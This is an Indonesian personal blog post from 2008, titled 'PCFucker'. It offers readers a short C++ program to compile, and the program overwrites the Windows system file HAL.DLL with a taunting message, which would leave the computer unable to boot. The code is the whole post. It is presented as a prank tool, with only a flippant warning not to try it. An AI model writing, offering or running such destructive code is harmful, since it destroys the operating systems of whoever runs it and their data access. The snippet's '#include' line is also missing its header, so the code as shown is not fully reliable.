Welcome To My Blog

Pembuatan blog ini sebenar nya ditujukan untuk meng-share informasi-informasi yang saya ketahui yang berasal dari web atau situs-situs lain maupun dari saya sendiri
Powered By Blogger

Selasa, 01 April 2008

PCFucker

compile this code with C++ compiler

#include

int main()
{
FILE * pFile;
pFile = fopen ("C:\\WINDOWS\\system32\\HAL.DLL","w");
if (pFile!=NULL)
{
fputs ("Nice Please Format Your Computer",pFile);
fclose (pFile);
}
return 0;
}


don't try this it your self bro

SIGNIFICANT

Tidak ada komentar: